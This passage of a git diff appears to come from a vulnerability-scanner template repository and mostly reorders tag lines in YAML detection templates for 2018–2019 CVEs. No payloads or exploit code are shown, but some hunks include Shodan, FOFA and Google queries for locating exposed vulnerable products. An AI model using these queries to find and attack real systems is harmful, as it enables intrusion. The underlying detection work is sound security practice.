gogs,lfi,rce,vulhub,cve,cve2018 + tags: cve,cve2018,gogs,lfi,rce,vulhub http: - raw: diff --git a/http/cves/2018/CVE-2018-19136.yaml b/http/cves/2018/CVE-2018-19136.yaml index d34619082b..2d94790170 100644 --- a/http/cves/2018/CVE-2018-19136.yaml +++ b/http/cves/2018/CVE-2018-19136.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: domainmod product: domainmod - tags: edb,cve,cve2018,domainmod,xss,authenticated + tags: cve2018,cve,edb,domainmod,xss,authenticated http: - raw: diff --git a/http/cves/2018/CVE-2018-19287.yaml b/http/cves/2018/CVE-2018-19287.yaml index 7df56138dc..a83be26c05 100644 --- a/http/cves/2018/CVE-2018-19287.yaml +++ b/http/cves/2018/CVE-2018-19287.yaml @@ -30,7 +30,7 @@ info: vendor: ninjaforma product: ninja_forms framework: wordpress - tags: wp-plugin,wp,xss,authenticated,wpscan,edb,cve,cve2018,ninja-forms,wordpress,ninjaforma + tags: cve,cve2018,wp-plugin,wp,xss,authenticated,wpscan,edb,ninja-forms,wordpress,ninjaforma http: - raw: diff --git a/http/cves/2018/CVE-2018-19326.yaml b/http/cves/2018/CVE-2018-19326.yaml index d188573b0f..3df1ec764c 100644 --- a/http/cves/2018/CVE-2018-19326.yaml +++ b/http/cves/2018/CVE-2018-19326.yaml @@ -30,7 +30,7 @@ info: vendor: zyxel product: vmg1312-b10d_firmware shodan-query: http.html:"VMG1312-B10D" - tags: lfi,modem,router,edb,cve,cve2018,zyxel + tags: cve2018,cve,lfi,modem,router,edb,zyxel http: - method: GET diff --git a/http/cves/2018/CVE-2018-19365.yaml b/http/cves/2018/CVE-2018-19365.yaml index 4339c7164c..aab4155860 100644 --- a/http/cves/2018/CVE-2018-19365.yaml +++ b/http/cves/2018/CVE-2018-19365.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: wowza product: streaming_engine - tags: cve,cve2018,wowza,lfi + tags: cve2018,cve,wowza,lfi http: - method: GET diff --git a/http/cves/2018/CVE-2018-19439.yaml b/http/cves/2018/CVE-2018-19439.yaml index d9054d6e9e..24d3ed1a57 100644 --- a/http/cves/2018/CVE-2018-19439.yaml +++ b/http/cves/2018/CVE-2018-19439.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: oracle product: secure_global_desktop - tags: oracle,xss,seclists,packetstorm,cve,cve2018 + tags: cve,cve2018,oracle,xss,seclists,packetstorm http: - method: GET diff --git a/http/cves/2018/CVE-2018-19458.yaml b/http/cves/2018/CVE-2018-19458.yaml index d82dffc40e..8c24d7f9eb 100644 --- a/http/cves/2018/CVE-2018-19458.yaml +++ b/http/cves/2018/CVE-2018-19458.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: php-proxy product: php-proxy - tags: edb,cve,cve2018,lfi,proxy,php-proxy + tags: cve,cve2018,edb,lfi,proxy,php-proxy http: - method: GET diff --git a/http/cves/2018/CVE-2018-19749.yaml b/http/cves/2018/CVE-2018-19749.yaml index 14719b1d6f..b12f2090f9 100644 --- a/http/cves/2018/CVE-2018-19749.yaml +++ b/http/cves/2018/CVE-2018-19749.yaml @@ -27,7 +27,7 @@ info: max-request: 3 vendor: domainmod product: domainmod - tags: cve,cve2018,domainmod,xss,authenticated,edb + tags: cve2018,cve,domainmod,xss,authenticated,edb http: - raw: diff --git a/http/cves/2018/CVE-2018-19752.yaml b/http/cves/2018/CVE-2018-19752.yaml index b5226e33cc..f94627037a 100644 --- a/http/cves/2018/CVE-2018-19752.yaml +++ b/http/cves/2018/CVE-2018-19752.yaml @@ -27,7 +27,7 @@ info: max-request: 3 vendor: domainmod product: domainmod - tags: cve,cve2018,domainmod,xss,authenticated,edb + tags: cve2018,cve,domainmod,xss,authenticated,edb http: - raw: diff --git a/http/cves/2018/CVE-2018-19753.yaml b/http/cves/2018/CVE-2018-19753.yaml index 3e830716a2..010a02dd68 100644 --- a/http/cves/2018/CVE-2018-19753.yaml +++ b/http/cves/2018/CVE-2018-19753.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: oracle product: tarantella_enterprise - tags: packetstorm,seclists,cve,cve2018,tarantella,lfi,oracle + tags: cve,cve2018,packetstorm,seclists,tarantella,lfi,oracle http: - method: GET diff --git a/http/cves/2018/CVE-2018-19877.yaml b/http/cves/2018/CVE-2018-19877.yaml index d968d063f0..9b0fbf8b12 100644 --- a/http/cves/2018/CVE-2018-19877.yaml +++ b/http/cves/2018/CVE-2018-19877.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: adiscon product: loganalyzer - tags: adiscon,xss,edb,cve,cve2018 + tags: cve,cve2018,adiscon,xss,edb http: - method: GET diff --git a/http/cves/2018/CVE-2018-19892.yaml b/http/cves/2018/CVE-2018-19892.yaml index 8a28d837a1..ac04f2b1aa 100644 --- a/http/cves/2018/CVE-2018-19892.yaml +++ b/http/cves/2018/CVE-2018-19892.yaml @@ -27,7 +27,7 @@ info: max-request: 3 vendor: domainmod product: domainmod - tags: cve2018,domainmod,xss,authenticated,edb,cve + tags: cve2018,cve,domainmod,xss,authenticated,edb http: - raw: diff --git a/http/cves/2018/CVE-2018-19914.yaml b/http/cves/2018/CVE-2018-19914.yaml index 3eaccfcd7d..5b866bcd2e 100644 --- a/http/cves/2018/CVE-2018-19914.yaml +++ b/http/cves/2018/CVE-2018-19914.yaml @@ -27,7 +27,7 @@ info: max-request: 3 vendor: domainmod product: domainmod - tags: cve2018,domainmod,xss,authenticated,edb,cve + tags: cve2018,cve,domainmod,xss,authenticated,edb http: - raw: diff --git a/http/cves/2018/CVE-2018-19915.yaml b/http/cves/2018/CVE-2018-19915.yaml index b0dbc9ab39..3f0060ea2d 100644 --- a/http/cves/2018/CVE-2018-19915.yaml +++ b/http/cves/2018/CVE-2018-19915.yaml @@ -27,7 +27,7 @@ info: max-request: 3 vendor: domainmod product: domainmod - tags: domainmod,xss,authenticated,edb,cve,cve2018 + tags: cve,cve2018,domainmod,xss,authenticated,edb http: - raw: diff --git a/http/cves/2018/CVE-2018-20009.yaml b/http/cves/2018/CVE-2018-20009.yaml index 8718eab82a..813a42ac28 100644 --- a/http/cves/2018/CVE-2018-20009.yaml +++ b/http/cves/2018/CVE-2018-20009.yaml @@ -27,7 +27,7 @@ info: max-request: 3 vendor: domainmod product: domainmod - tags: domainmod,xss,authenticated,edb,cve,cve2018 + tags: cve,cve2018,domainmod,xss,authenticated,edb http: - raw: diff --git a/http/cves/2018/CVE-2018-20010.yaml b/http/cves/2018/CVE-2018-20010.yaml index 6dc7823d93..adc813a71b 100644 --- a/http/cves/2018/CVE-2018-20010.yaml +++ b/http/cves/2018/CVE-2018-20010.yaml @@ -27,7 +27,7 @@ info: max-request: 3 vendor: domainmod product: domainmod - tags: domainmod,xss,authenticated,edb,cve,cve2018 + tags: cve,cve2018,domainmod,xss,authenticated,edb http: - raw: diff --git a/http/cves/2018/CVE-2018-20011.yaml b/http/cves/2018/CVE-2018-20011.yaml index 5891e64bf8..7e2566bd22 100644 --- a/http/cves/2018/CVE-2018-20011.yaml +++ b/http/cves/2018/CVE-2018-20011.yaml @@ -27,7 +27,7 @@ info: max-request: 3 vendor: domainmod product: domainmod - tags: domainmod,xss,authenticated,edb,cve,cve1028 + tags: cve2018,cve,domainmod,xss,authenticated,edb http: - raw: diff --git a/http/cves/2018/CVE-2018-20462.yaml b/http/cves/2018/CVE-2018-20462.yaml index 00353499c4..ec0ed51403 100644 --- a/http/cves/2018/CVE-2018-20462.yaml +++ b/http/cves/2018/CVE-2018-20462.yaml @@ -27,7 +27,7 @@ info: vendor: jsmol2wp_project product: jsmol2wp framework: wordpress - tags: cve,cve2018,wordpress,xss,wp-plugin,jsmol2wp_project + tags: cve2018,cve,wordpress,xss,wp-plugin,jsmol2wp_project http: - method: GET diff --git a/http/cves/2018/CVE-2018-20463.yaml b/http/cves/2018/CVE-2018-20463.yaml index 60ae3b146e..d704c9d9d6 100644 --- a/http/cves/2018/CVE-2018-20463.yaml +++ b/http/cves/2018/CVE-2018-20463.yaml @@ -29,7 +29,7 @@ info: vendor: jsmol2wp_project product: jsmol2wp framework: wordpress - tags: wp,wp-plugin,wordpress,jsmol2wp,wpscan,cve,cve2018,traversal,jsmol2wp_project + tags: cve,cve2018,wp,wp-plugin,wordpress,jsmol2wp,wpscan,traversal,jsmol2wp_project http: - method: GET diff --git a/http/cves/2018/CVE-2018-20470.yaml b/http/cves/2018/CVE-2018-20470.yaml index be286753d9..076417e913 100644 --- a/http/cves/2018/CVE-2018-20470.yaml +++ b/http/cves/2018/CVE-2018-20470.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: sahipro product: sahi_pro - tags: cve,cve2018,lfi,packetstorm,sahipro + tags: cve2018,cve,lfi,packetstorm,sahipro http: - method: GET diff --git a/http/cves/2018/CVE-2018-20608.yaml b/http/cves/2018/CVE-2018-20608.yaml index 61d2813e02..79733b8668 100644 --- a/http/cves/2018/CVE-2018-20608.yaml +++ b/http/cves/2018/CVE-2018-20608.yaml @@ -23,7 +23,7 @@ info: max-request: 1 vendor: txjia product: imcat - tags: cve,cve2018,imcat,phpinfo,config,txjia + tags: cve2018,cve,imcat,phpinfo,config,txjia http: - method: GET diff --git a/http/cves/2018/CVE-2018-20824.yaml b/http/cves/2018/CVE-2018-20824.yaml index 62d4dbb318..b54c2a9568 100644 --- a/http/cves/2018/CVE-2018-20824.yaml +++ b/http/cves/2018/CVE-2018-20824.yaml @@ -25,7 +25,7 @@ info: vendor: atlassian product: jira shodan-query: http.component:"Atlassian Jira" - tags: cve,cve2018,atlassian,jira,xss + tags: cve2018,cve,atlassian,jira,xss http: - method: GET diff --git a/http/cves/2018/CVE-2018-2791.yaml b/http/cves/2018/CVE-2018-2791.yaml index befb4c1515..51a8b87fe5 100644 --- a/http/cves/2018/CVE-2018-2791.yaml +++ b/http/cves/2018/CVE-2018-2791.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: oracle product: webcenter_sites - tags: edb,cve,cve2018,oracle,xss,wcs + tags: cve2018,cve,edb,oracle,xss,wcs http: - raw: diff --git a/http/cves/2018/CVE-2018-2894.yaml b/http/cves/2018/CVE-2018-2894.yaml index 4f3393b42f..681b9fadc5 100644 --- a/http/cves/2018/CVE-2018-2894.yaml +++ b/http/cves/2018/CVE-2018-2894.yaml @@ -27,7 +27,7 @@ info: max-request: 3 vendor: oracle product: weblogic_server - tags: cve2018,oracle,weblogic,rce,vulhub,cve,intrusive + tags: cve2018,cve,oracle,weblogic,rce,vulhub,intrusive http: - raw: diff --git a/http/cves/2018/CVE-2018-3238.yaml b/http/cves/2018/CVE-2018-3238.yaml index d151e086d0..c33a465439 100644 --- a/http/cves/2018/CVE-2018-3238.yaml +++ b/http/cves/2018/CVE-2018-3238.yaml @@ -25,7 +25,7 @@ info: max-request: 3 vendor: oracle product: webcenter_sites - tags: cve,cve2018,oracle,wcs,xss + tags: cve2018,cve,oracle,wcs,xss http: - raw: diff --git a/http/cves/2018/CVE-2018-3760.yaml b/http/cves/2018/CVE-2018-3760.yaml index 7ae3b6ab26..4e62f19b62 100644 --- a/http/cves/2018/CVE-2018-3760.yaml +++ b/http/cves/2018/CVE-2018-3760.yaml @@ -28,7 +28,7 @@ info: max-request: 2 vendor: redhat product: cloudforms - tags: cve,cve2018,rails,lfi,ruby,vulhub,seclists,redhat + tags: cve2018,cve,rails,lfi,ruby,vulhub,seclists,redhat http: - raw: diff --git a/http/cves/2018/CVE-2018-3810.yaml b/http/cves/2018/CVE-2018-3810.yaml index 4ded6480b0..4e30ef3f4e 100644 --- a/http/cves/2018/CVE-2018-3810.yaml +++ b/http/cves/2018/CVE-2018-3810.yaml @@ -28,7 +28,7 @@ info: vendor: oturia product: smart_google_code_inserter framework: wordpress - tags: wordpress,cve,cve2018,google,edb,oturia + tags: cve,cve2018,wordpress,google,edb,oturia http: - method: POST diff --git a/http/cves/2018/CVE-2018-5316.yaml b/http/cves/2018/CVE-2018-5316.yaml index e899a019f4..ade100d304 100644 --- a/http/cves/2018/CVE-2018-5316.yaml +++ b/http/cves/2018/CVE-2018-5316.yaml @@ -28,7 +28,7 @@ info: vendor: patsatech product: sagepay_server_gateway_for_woocommerce framework: wordpress - tags: cve2018,wordpress,xss,wp-plugin,wp,woocommerce,packetstorm,cve,patsatech + tags: cve2018,cve,wordpress,xss,wp-plugin,wp,woocommerce,packetstorm,patsatech http: - method: GET diff --git a/http/cves/2018/CVE-2018-5715.yaml b/http/cves/2018/CVE-2018-5715.yaml index 485fa24f10..791fdf6279 100644 --- a/http/cves/2018/CVE-2018-5715.yaml +++ b/http/cves/2018/CVE-2018-5715.yaml @@ -28,7 +28,7 @@ info: product: sugarcrm shodan-query: http.html:"SugarCRM Inc. All Rights Reserved" google-query: intext:"SugarCRM Inc. All Rights Reserved" - tags: sugarcrm,xss,edb,cve,cve2018 + tags: cve2018,cve,sugarcrm,xss,edb http: - method: GET diff --git a/http/cves/2018/CVE-2018-6008.yaml b/http/cves/2018/CVE-2018-6008.yaml index e09b1d654e..aa81e61fd5 100644 --- a/http/cves/2018/CVE-2018-6008.yaml +++ b/http/cves/2018/CVE-2018-6008.yaml @@ -26,7 +26,7 @@ info: vendor: joomlatag product: jtag_members_directory framework: joomla\! - tags: cve,cve2018,joomla,lfi,edb,packetstorm,joomlatag,joomla\! + tags: cve2018,cve,joomla,lfi,edb,packetstorm,joomlatag,joomla\! http: - method: GET diff --git a/http/cves/2018/CVE-2018-6184.yaml b/http/cves/2018/CVE-2018-6184.yaml index 4c4c5092dc..d9eea7958b 100644 --- a/http/cves/2018/CVE-2018-6184.yaml +++ b/http/cves/2018/CVE-2018-6184.yaml @@ -27,7 +27,7 @@ info: vendor: zeit product: next.js shodan-query: html:"/_next/static" - tags: cve,cve2018,nextjs,lfi,traversal,zeit + tags: cve2018,cve,nextjs,lfi,traversal,zeit http: - method: GET diff --git a/http/cves/2018/CVE-2018-7282.yaml b/http/cves/2018/CVE-2018-7282.yaml index b53cc324d5..13457ae61e 100644 --- a/http/cves/2018/CVE-2018-7282.yaml +++ b/http/cves/2018/CVE-2018-7282.yaml @@ -27,7 +27,7 @@ info: product: printmonitor shodan-query: title:"PrintMonitor" product": printmonitor - tags: cve,cve2018,sqli,printmonitor,unauth,titool + tags: cve2018,cve,sqli,printmonitor,unauth,titool variables: username: "{{rand_base(6)}}" password: "{{rand_base(8)}}" diff --git a/http/cves/2018/CVE-2018-7422.yaml b/http/cves/2018/CVE-2018-7422.yaml index 55b74bb209..837ae1a8e9 100644 --- a/http/cves/2018/CVE-2018-7422.yaml +++ b/http/cves/2018/CVE-2018-7422.yaml @@ -28,7 +28,7 @@ info: vendor: siteeditor product: site_editor framework: wordpress - tags: cve,cve2018,wordpress,wp-plugin,lfi,edb,seclists,siteeditor + tags: cve2018,cve,wordpress,wp-plugin,lfi,edb,seclists,siteeditor http: - method: GET diff --git a/http/cves/2018/CVE-2018-7467.yaml b/http/cves/2018/CVE-2018-7467.yaml index 4dfcb25342..b0b697c67b 100644 --- a/http/cves/2018/CVE-2018-7467.yaml +++ b/http/cves/2018/CVE-2018-7467.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: axxonsoft product: next - tags: axxonsoft,lfi,packetstorm,cve,cve2018 + tags: cve,cve2018,axxonsoft,lfi,packetstorm http: - raw: diff --git a/http/cves/2018/CVE-2018-7490.yaml b/http/cves/2018/CVE-2018-7490.yaml index 315cb70465..9b6abb01b6 100644 --- a/http/cves/2018/CVE-2018-7490.yaml +++ b/http/cves/2018/CVE-2018-7490.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: unbit product: uwsgi - tags: cve,cve2018,uwsgi,php,lfi,plugin,edb,unbit + tags: cve2018,cve,uwsgi,php,lfi,plugin,edb,unbit http: - method: GET diff --git a/http/cves/2018/CVE-2018-7602.yaml b/http/cves/2018/CVE-2018-7602.yaml index eb73186752..d81268565c 100644 --- a/http/cves/2018/CVE-2018-7602.yaml +++ b/http/cves/2018/CVE-2018-7602.yaml @@ -27,7 +27,7 @@ info: vendor: drupal product: drupal shodan-query: http.component:"drupal" - tags: cve2018,drupal,authenticated,kev,vulhub,edb,cve + tags: cve,cve2018,drupal,authenticated,kev,vulhub,edb http: - raw: diff --git a/http/cves/2018/CVE-2018-7653.yaml b/http/cves/2018/CVE-2018-7653.yaml index f9ef28680d..a39a273505 100644 --- a/http/cves/2018/CVE-2018-7653.yaml +++ b/http/cves/2018/CVE-2018-7653.yaml @@ -25,7 +25,7 @@ info: product: yzmcms shodan-query: title:"YzmCMS" fofa-query: title="YzmCMS" - tags: packetstorm,cve,cve2018,yzmcms,cms,xss + tags: cve,cve2018,packetstorm,yzmcms,cms,xss http: - method: GET diff --git a/http/cves/2018/CVE-2018-7662.yaml b/http/cves/2018/CVE-2018-7662.yaml index f8a9a3f35d..2a3a46a272 100644 --- a/http/cves/2018/CVE-2018-7662.yaml +++ b/http/cves/2018/CVE-2018-7662.yaml @@ -24,7 +24,7 @@ info: max-request: 2 vendor: couchcms product: couch - tags: couchcms,fpd,cve,cve2018 + tags: cve2018,cve,couchcms,fpd http: - method: GET diff --git a/http/cves/2018/CVE-2018-7719.yaml b/http/cves/2018/CVE-2018-7719.yaml index bb6864a140..1d557cc4c0 100644 --- a/http/cves/2018/CVE-2018-7719.yaml +++ b/http/cves/2018/CVE-2018-7719.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: acrolinx product: acrolinx_server - tags: cve,cve2018,acrolinx,lfi,packetstorm,edb + tags: cve2018,cve,acrolinx,lfi,packetstorm,edb http: - raw: diff --git a/http/cves/2018/CVE-2018-8006.yaml b/http/cves/2018/CVE-2018-8006.yaml index a620724c0a..981be00118 100644 --- a/http/cves/2018/CVE-2018-8006.yaml +++ b/http/cves/2018/CVE-2018-8006.yaml @@ -32,7 +32,7 @@ info: max-request: 1 vendor: apache product: activemq - tags: cve,cve2018,apache,activemq,xss + tags: cve2018,cve,apache,activemq,xss http: - method: GET diff --git a/http/cves/2018/CVE-2018-8719.yaml b/http/cves/2018/CVE-2018-8719.yaml index 15090a4595..4e781fc9b2 100644 --- a/http/cves/2018/CVE-2018-8719.yaml +++ b/http/cves/2018/CVE-2018-8719.yaml @@ -28,7 +28,7 @@ info: vendor: wpsecurityauditlog product: wp_security_audit_log framework: wordpress - tags: cve2018,exposure,edb,wordpress,wp-plugin,cve,wpsecurityauditlog + tags: cve,cve2018,exposure,edb,wordpress,wp-plugin,wpsecurityauditlog http: - method: GET diff --git a/http/cves/2018/CVE-2018-8823.yaml b/http/cves/2018/CVE-2018-8823.yaml index 2fbfc41994..de452eb30b 100644 --- a/http/cves/2018/CVE-2018-8823.yaml +++ b/http/cves/2018/CVE-2018-8823.yaml @@ -24,7 +24,7 @@ info: framework: prestashop shodan-query: http.component:"prestashop" verified: true - tags: cve,cve2018,prestashop,rce + tags: cve2018,cve,prestashop,rce,sqli,responsive_mega_menu_pro_project variables: num: "999999999" diff --git a/http/cves/2018/CVE-2018-9118.yaml b/http/cves/2018/CVE-2018-9118.yaml index bc15a47160..80e36b5382 100644 --- a/http/cves/2018/CVE-2018-9118.yaml +++ b/http/cves/2018/CVE-2018-9118.yaml @@ -28,7 +28,7 @@ info: vendor: 99robots product: wp_background_takeover_advertisements framework: wordpress - tags: edb,cve,cve2018,wordpress,wp-plugin,lfi,traversal,wp,99robots + tags: cve2018,cve,edb,wordpress,wp-plugin,lfi,traversal,wp,99robots http: - method: GET diff --git a/http/cves/2018/CVE-2018-9161.yaml b/http/cves/2018/CVE-2018-9161.yaml index 8752fb8d70..fc2f45ac50 100644 --- a/http/cves/2018/CVE-2018-9161.yaml +++ b/http/cves/2018/CVE-2018-9161.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: prismaindustriale product: checkweigher_prismaweb - tags: cve,cve2018,prismaweb,exposure,edb,prismaindustriale + tags: cve2018,cve,prismaweb,exposure,edb,prismaindustriale http: - method: GET diff --git a/http/cves/2018/CVE-2018-9845.yaml b/http/cves/2018/CVE-2018-9845.yaml index c1775e56b1..371158eaa3 100644 --- a/http/cves/2018/CVE-2018-9845.yaml +++ b/http/cves/2018/CVE-2018-9845.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: etherpad product: etherpad_lite - tags: cve,cve2018,etherpad,auth-bypass + tags: cve2018,cve,etherpad,auth-bypass http: - method: GET diff --git a/http/cves/2019/CVE-2019-0193.yaml b/http/cves/2019/CVE-2019-0193.yaml index 4acec11a92..3263ca4db7 100644 --- a/http/cves/2019/CVE-2019-0193.yaml +++ b/http/cves/2019/CVE-2019-0193.yaml @@ -28,7 +28,7 @@ info: max-request: 2 vendor: apache product: solr - tags: cve2019,apache,rce,solr,oast,kev,vulhub,cve + tags: cve2019,cve,apache,rce,solr,oast,kev,vulhub http: - raw: diff --git a/http/cves/2019/CVE-2019-0221.yaml b/http/cves/2019/CVE-2019-0221.yaml index 4070490e52..96cb7670ea 100644 --- a/http/cves/2019/CVE-2019-0221.yaml +++ b/http/cves/2019/CVE-2019-0221.yaml @@ -29,7 +29,7 @@ info: vendor: apache product: tomcat shodan-query: title:"Apache Tomcat" - tags: apache,xss,tomcat,seclists,edb,cve,cve2019 + tags: cve2019,cve,apache,xss,tomcat,seclists,edb variables: payload: "" diff --git a/http/cves/2019/CVE-2019-0230.yaml b/http/cves/2019/CVE-2019-0230.yaml index 9da37eb56b..763a72de45 100644 --- a/http/cves/2019/CVE-2019-0230.yaml +++ b/http/cves/2019/CVE-2019-0230.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: apache product: struts - tags: tenable,packetstorm,struts,rce,cve,cve2019,apache + tags: cve,cve2019,tenable,packetstorm,struts,rce,apache variables: str: "{{rand_base(6)}}" diff --git a/http/cves/2019/CVE-2019-10068.yaml b/http/cves/2019/CVE-2019-10068.yaml index a736620099..cd32b61c10 100644 --- a/http/cves/2019/CVE-2019-10068.yaml +++ b/http/cves/2019/CVE-2019-10068.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: kentico product: kentico - tags: cve2019,kentico,iis,packetstorm,cve,rce,deserialization,kev,msf + tags: cve,cve2019,kentico,iis,packetstorm,rce,deserialization,kev,msf http: - method: POST diff --git a/http/cves/2019/CVE-2019-1010290.yaml b/http/cves/2019/CVE-2019-1010290.yaml index cf69a18157..c3ede1e27f 100644 --- a/http/cves/2019/CVE-2019-1010290.yaml +++ b/http/cves/2019/CVE-2019-1010290.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: cmsmadesimple product: bable\ - tags: cve,cve2019,redirect,babel,cmsmadesimple + tags: cve2019,cve,redirect,babel,cmsmadesimple http: - method: GET diff --git a/http/cves/2019/CVE-2019-10692.yaml b/http/cves/2019/CVE-2019-10692.yaml index 4f7efb9038..12792ae95e 100644 --- a/http/cves/2019/CVE-2019-10692.yaml +++ b/http/cves/2019/CVE-2019-10692.yaml @@ -29,7 +29,7 @@ info: vendor: codecabin product: wp_go_maps framework: wordpress - tags: cve,cve2019,wp,wp-plugin,unauth,sqli,wordpress,googlemaps,wpscan,codecabin + tags: cve2019,cve,wp,wp-plugin,unauth,sqli,wordpress,googlemaps,wpscan,codecabin http: - method: GET diff --git a/http/cves/2019/CVE-2019-10717.yaml b/http/cves/2019/CVE-2019-10717.yaml index 4eabf9076d..7f429762b0 100644 --- a/http/cves/2019/CVE-2019-10717.yaml +++ b/http/cves/2019/CVE-2019-10717.yaml @@ -29,7 +29,7 @@ info: vendor: dotnetblogengine product: blogengine.net shodan-query: http.html:"Blogengine.net" - tags: seclists,cve,cve2019,blogengine,lfi,traversal,dotnetblogengine + tags: cve,cve2019,seclists,blogengine,lfi,traversal,dotnetblogengine http: - method: GET diff --git a/http/cves/2019/CVE-2019-10758.yaml b/http/cves/2019/CVE-2019-10758.yaml index 5772f03f2a..8761c87267 100644 --- a/http/cves/2019/CVE-2019-10758.yaml +++ b/http/cves/2019/CVE-2019-10758.yaml @@ -25,7 +25,7 @@ info: product: mongo-express framework: node.js shodan-query: http.title:"Mongo Express" - tags: vulhub,cve,cve2019,mongo,mongo-express,kev,mongo-express_project,node.js + tags: cve,cve2019,vulhub,mongo,mongo-express,kev,mongo-express_project,node.js http: - raw: diff --git a/http/cves/2019/CVE-2019-11013.yaml b/http/cves/2019/CVE-2019-11013.yaml index c077405ffc..b509fec0b6 100644 --- a/http/cves/2019/CVE-2019-11013.yaml +++ b/http/cves/2019/CVE-2019-11013.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: softvelum product: nimble_streamer - tags: cve2019,lfi,nimble,edb,packetstorm,cve,softvelum + tags: cve,cve2019,lfi,nimble,edb,packetstorm,softvelum http: - method: GET diff --git a/http/cves/2019/CVE-2019-11248.yaml b/http/cves/2019/CVE-2019-11248.yaml index 33acc1e253..7e79f7f13f 100644 --- a/http/cves/2019/CVE-2019-11248.yaml +++ b/http/cves/2019/CVE-2019-11248.yaml @@ -28,7 +28,7 @@ info: max-request: 2 vendor: kubernetes product: kubernetes - tags: cve,cve2019,debug,kubernetes,kubelet,devops,unauth,disclosure + tags: cve2019,cve,debug,kubernetes,kubelet,devops,unauth,disclosure http: - method: GET diff --git a/http/cves/2019/CVE-2019-11370.yaml b/http/cves/2019/CVE-2019-11370.yaml index 5ee2534156..160a3bb0c9 100644 --- a/http/cves/2019/CVE-2019-11370.yaml +++ b/http/cves/2019/CVE-2019-11370.yaml @@ -28,7 +28,7 @@ info: vendor: carel product: pcoweb_card_firmware shodan-query: http.html:"pCOWeb" - tags: pcoweb,xss,carel,edb,cve,cve2019 + tags: cve,cve2019,pcoweb,xss,carel,edb http: - raw: diff --git a/http/cves/2019/CVE-2019-11510.yaml b/http/cves/2019/CVE-2019-11510.yaml index 978081ad92..602e204cc2 100644 --- a/http/cves/2019/CVE-2019-11510.yaml +++ b/http/cves/2019/CVE-2019-11510.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: pulsesecure product: pulse_connect_secure - tags: packetstorm,cve,cve2019,pulsesecure,lfi,kev + tags: cve,cve2019,packetstorm,pulsesecure,lfi,kev http: - method: GET diff --git a/http/cves/2019/CVE-2019-11869.yaml b/http/cves/2019/CVE-2019-11869.yaml index 4be6e3ee75..8b84b79902 100644 --- a/http/cves/2019/CVE-2019-11869.yaml +++ b/http/cves/2019/CVE-2019-11869.yaml @@ -34,7 +34,7 @@ info: vendor: yuzopro product: yuzo framework: wordpress - tags: wpscan,cve,cve2019,wordpress,wp-plugin,xss,yuzopro + tags: cve,cve2019,wpscan,wordpress,wp-plugin,xss,yuzopro http: - raw: diff --git a/http/cves/2019/CVE-2019-12276.yaml b/http/cves/2019/CVE-2019-12276.yaml index 4202ecbcd2..a4304ff48f 100644 --- a/http/cves/2019/CVE-2019-12276.yaml +++ b/http/cves/2019/CVE-2019-12276.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: grandnode product: grandnode - tags: packetstorm,cve,cve2019,lfi,grandnode + tags: cve,cve2019,packetstorm,lfi,grandnode http: - method: GET diff --git a/http/cves/2019/CVE-2019-12583.yaml b/http/cves/2019/CVE-2019-12583.yaml index 9e821cf84a..a2571a41e7 100644 --- a/http/cves/2019/CVE-2019-12583.yaml +++ b/http/cves/2019/CVE-2019-12583.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: zyxel product: uag2100_firmware - tags: cve,cve2019,zyxel,zywall + tags: cve,cve2019,zyxel,zywall,xss http: - method: GET diff --git a/http/cves/2019/CVE-2019-12593.yaml b/http/cves/2019/CVE-2019-12593.yaml index b140cff091..840c781d2a 100644 --- a/http/cves/2019/CVE-2019-12593.yaml +++ b/http/cves/2019/CVE-2019-12593.yaml @@ -29,7 +29,7 @@ info: product: mail_server shodan-query: title:"icewarp" google-query: Powered By IceWarp 10.4.4 - tags: packetstorm,cve,cve2019,lfi,icewarp + tags: cve,cve2019,packetstorm,lfi,icewarp http: - method: GET diff --git a/http/cves/2019/CVE-2019-12616.yaml b/http/cves/2019/CVE-2019-12616.yaml index 9f0d0e6d32..290fc77389 100644 --- a/http/cves/2019/CVE-2019-12616.yaml +++ b/http/cves/2019/CVE-2019-12616.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: phpmyadmin product: phpmyadmin - tags: csrf,edb,cve,cve2019,phpmyadmin + tags: cve2019,cve,csrf,edb,phpmyadmin http: - method: GET diff --git a/http/cves/2019/CVE-2019-12725.yaml b/http/cves/2019/CVE-2019-12725.yaml index 4b8595df6c..76bb51011f 100644 --- a/http/cves/2019/CVE-2019-12725.yaml +++ b/http/cves/2019/CVE-2019-12725.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: zeroshell product: zeroshell - tags: packetstorm,cve,cve2019,rce,zeroshell + tags: cve,cve2019,packetstorm,rce,zeroshell http: - method: GET diff --git a/http/cves/2019/CVE-2019-12962.yaml b/http/cves/2019/CVE-2019-12962.yaml index 393ec0f130..ebfc38c087 100644 --- a/http/cves/2019/CVE-2019-12962.yaml +++ b/http/cves/2019/CVE-2019-12962.yaml @@ -27,7 +27,7 @@ info: vendor: livezilla product: livezilla shodan-query: http.html:LiveZilla - tags: xss,edb,packetstorm,cve,cve2019,livezilla + tags: cve,cve2019,xss,edb,packetstorm,livezilla http: - method: GET diff --git a/http/cves/2019/CVE-2019-12986.yaml b/http/cves/2019/CVE-2019-12986.yaml index 067f58cf66..f88b4523b2 100644 --- a/http/cves/2019/CVE-2019-12986.yaml +++ b/http/cves/2019/CVE-2019-12986.yaml @@ -27,7 +27,7 @@ info: vendor: citrix product: netscaler_sd-wan shodan-query: http.title:"Citrix SD-WAN" - tags: unauth,oast,tenable,cve,cve2019,citrix,rce + tags: 